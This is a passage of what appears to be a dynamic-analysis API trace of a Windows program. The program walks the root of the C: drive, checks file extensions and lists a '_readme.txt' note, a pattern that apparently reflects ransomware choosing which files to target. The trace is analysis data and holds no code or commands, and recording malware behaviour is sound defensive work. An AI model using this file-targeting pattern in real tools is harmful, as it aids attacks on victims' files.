lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x4e9ad440, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.067] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.067] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2e8 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa8) returned 0x3152ab8 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3df0 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef888 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175828 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161c80 | out: hHeap=0x680000) returned 1 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2e8 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.068] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x4ecf3280, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.068] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.068] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2e8 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2e8 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.068] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa95e3610, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa95e3610, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfc) returned 0x99dea38 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2e8 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3df0 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef888 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175828 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3df0 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.068] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e60 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.069] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa259c860, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa259c860, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.069] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16c) returned 0x3112760 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef888 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efab8 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175828 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef130 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef388 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2e8 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3df0 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e60 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.069] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0091.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0091.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0091.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0091.070] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c796360, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0x9c796360, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x9c796360, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.070] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0091.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.070] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x214) returned 0x3165e90 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e60 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2e8 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb30 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef310 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3df0 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0091.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0091.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef888 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efab8 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175828 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef130 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef388 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3112760 | out: hHeap=0x680000) returned 1 [0091.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.071] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3183660, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3183660, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31a97c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0091.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.071] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.071] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3183660, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3183660, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31a97c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0091.071] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0091.071] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, 